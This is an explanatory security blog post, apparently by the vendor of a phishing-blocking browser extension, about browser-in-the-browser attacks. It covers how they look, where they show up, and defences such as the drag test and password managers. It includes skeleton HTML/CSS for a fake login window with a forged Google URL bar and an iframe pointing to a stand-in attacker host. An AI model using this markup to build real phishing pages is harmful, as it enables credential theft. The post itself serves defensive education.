The fake login window inside the real browser

What BitB actually shows you

You land on a page that wants you to sign in with a third-party identity provider (Google, Microsoft, Apple, Steam, WalletConnect). You click "Sign in." A window appears with rounded corners, darkened backdrop, gradient title bar, three traffic-light buttons, a URL bar reading accounts.google.com/signin, and a credential form. It looks identical to the OAuth popup your browser has shown you a thousand times. It is not a popup. It is a <div> drawn inside the phishing page, styled with CSS to imitate browser chrome, wrapping an <iframe> that points to an attacker-controlled credential harvester. The URL bar is a static string. It cannot navigate. It is paint.

Why this was unknown before 2022

mr.d0x first publicly disclosed the technique in a write-up titled "Browser In The Browser (BITB) Attack" in March 2022, with a working PoC on GitHub. Before that, the prevailing assumption among defenders and red teamers was that OS-level window chrome was a security boundary the page could not cross. Google and Microsoft had moved their login flows to popup windows specifically because the popup felt safer: the URL bar was real, and a user could verify the domain before typing a password. Phishing pages could fake the login form by redirecting the tab, but not the popup itself, because the popup was not inside their DOM.

mr.d0x showed the popup did not need to be a popup. If a phishing page draws something that looks like a popup with enough fidelity, the entire mental model collapses. Group-IB published an analysis in 2022 documenting BitB used against Steam credentials, and BleepingComputer covered the same family of attacks through 2022 to 2024. No browser bug, no zero-day, no CVE. It required only that users trust the visual appearance of an OAuth popup more than they trust the URL bar of the parent page.

The HTML/CSS recipe

The fake window is built from three pieces: a backdrop that dims the page behind, a window container with rounded corners and a shadow, and a title bar imitating browser chrome. The stripped-down skeleton:

<div class="bitb-backdrop">
  <div class="bitb-window">
    <div class="bitb-titlebar">
      <span class="dot red"></span>
      <span class="dot yellow"></span>
      <span class="dot green"></span>
      <div class="bitb-urlbar">accounts.google.com/signin</div>
    </div>
    <iframe src="https://attacker.example/fake-google-login"></iframe>
  </div>
</div>

And the CSS that turns those div tags into something that looks like a window:

.bitb-window {
  width: 480px;
  background: #fff;
  border-radius: 8px;
  box-shadow: 0 20px 60px rgba(0,0,0,0.4);
  overflow: hidden;
}
.bitb-titlebar {
  height: 36px;
  background: linear-gradient(#e8e8e8, #d4d4d4);
  display: flex;
  align-items: center;
  padding: 0 12px;
}
.bitb-urlbar {
  background: #f1f3f4;
  border-radius: 12px;
  padding: 4px 12px;
  margin-left: 16px;
  font: 12px sans-serif;
}
.dot { width: 12px; height: 12px; border-radius: 50%; margin-right: 6px; }
.dot.red { background: #ff5f56; }
.dot.yellow { background: #ffbd2e; }
.dot.green { background: #27c93f; }

That is the entire trick. The URL bar is a span containing the literal text accounts.google.com/signin. Clicking it does nothing. The window cannot be moved outside the parent browser window, because it is a div inside that window, not a separate OS object. That is the only tell, and most users do not test for it.

Where you encounter BitB

Crypto wallet-connect flows

The most lucrative BitB target in 2024 and 2025 is the wallet-connect flow on fake DeFi pages. A user lands on a Uniswap or Aerodrome clone, clicks "Connect Wallet," and a fake WalletConnect popup appears with wallet icons, QR code, and an "Approve" button. The fake popup harvests the seed phrase or signs a drainer transaction.

SSO logins on fake SaaS pages

Phishing pages imitating Notion, Figma, Salesforce, or Slack include a "Sign in with Google" or "Sign in with Microsoft" button. Clicking it opens a BitB popup that captures corporate credentials. Campaigns target employees of a specific company via a spear-phishing email linking to a fake "shared document."

Game "Login with Steam" phishing

Steam credentials are valuable because of skin and item trading markets that move tens of millions of dollars per year. Fake skin-trading sites and item-giveaway sites have used BitB consistently since 2022. BleepingComputer documented multiple campaigns across 2022 to 2024.

Crypto DeFi airdrop claim pages

An airdrop claim site tells a user they qualify for a free token allocation. To claim, the user must "sign in" with their wallet via a popup asking for the seed phrase to "verify ownership." The popup is a BitB. The Chainalysis 2024 Crypto Crime Report flagged this as a meaningful share of airdrop-themed phishing losses.

Real verifiable examples 2022-2025

The original mr.d0x disclosure (March 2022) shipped a PoC repository with templated fake popups for Google, Microsoft, and Apple. Within a month, Group-IB and Zscaler documented BitB used against Steam credentials. BleepingComputer covered subsequent waves through 2023 and 2024. By 2024, Chainalysis reported BitB-style wallet-connect lures as a recurring pattern in airdrop phishing, contributing to approval-based wallet theft estimated at hundreds of millions of dollars in 2024 losses. The MDN window.open reference documents the legitimate popup behavior that BitB imitates.

The 2-second test that defeats BitB

Try to drag the popup outside the parent browser window. A real OS popup is a separate window object: you can pull it onto a second monitor or just off the top edge of the current window. A BitB fake is a div inside the page. The moment you drag it past the edge of the browser, it stops. That is the entire test. Two seconds, no tools, and it works on every BitB variant ever shipped, because DOM elements cannot escape the document.

The downside is that it requires the user to remember to perform it. Conditioning users to drag every OAuth popup is not realistic at population scale. The real defense has to work without the user thinking about it.

Why password managers are the strongest defense

1Password, Bitwarden, Apple Passwords, Google Passwords, and Dashlane bind saved credentials to the exact origin where they were captured. A Google credential is bound to accounts.google.com. A Microsoft credential is bound to login.microsoftonline.com. The manager autofills only if the page's origin matches.

A BitB popup lives inside a phishing page hosted on an attacker domain like g00gle-signin.cc. When the user clicks into the email field, the manager checks the real origin (the phishing domain), not the cosmetic URL drawn in the fake URL bar. Nothing autofills. The manager that has reliably autofilled their Google login for years just did not. That silence is the warning.

If the user types manually, the credential goes to the attacker. If the user pauses, the attack fails. The habit is simple: when autofill does not appear on a login you expect, stop. Close the tab and navigate from a bookmark.

How SafeBrowz fits in

BitB attacks survive only if the user reaches the page hosting the fake popup. The phishing domain is the weak link. SafeBrowz inspects every navigation against our brand-impersonation engine and a live blocklist. A page imitating Google or Microsoft SSO on a non-Google origin trips the brand detector. A wallet-connect lure on a freshly registered domain trips the short-lived crypto phishing heuristic. The page never loads, the fake popup never renders. Password managers remain the strongest single defense because they refuse to autofill the fake form, but SafeBrowz catches the page first. The SafeBrowz extension is free forever for phishing and brand impersonation blocking on Chrome, Firefox, and Edge.

FAQ

Can a BitB popup really not be moved outside the browser window?

Correct. A BitB popup is a DOM element, and DOM elements cannot exist outside the document. A real OS popup can be dragged onto a second monitor. Drag the popup off the top edge of the browser. If it stops at the edge, it is a BitB.

Does the URL bar in the BitB popup do anything?

No. It is a static CSS string. Clicking does nothing. It exists purely to imitate a real URL bar so glancing users see the expected domain.

Will my browser warn me about a BitB page?

Generally no. Google Safe Browsing and Microsoft SmartScreen block known phishing domains, but a freshly registered BitB host may not appear on those lists for hours.

Does HTTPS protect me from BitB?

No. A BitB phishing page is served over HTTPS with a valid Let's Encrypt certificate. The lock icon means nothing, because the page itself is the attack.

Is BitB the same as clickjacking or iframe overlay?

Related but different. Clickjacking hides a real button under a fake one. BitB draws a fake window wrapping a credential form. The distinctive element is the cosmetic browser-chrome around the iframe.

How does BitB compare to tab nabbing or pastejacking?

Tab nabbing rewrites a forgotten tab. Pastejacking swaps clipboard contents. BitB draws a fake OAuth popup inside an active phishing page. All three exploit visual trust. See also Permit2 signature attacks and lookalike wallet drainers.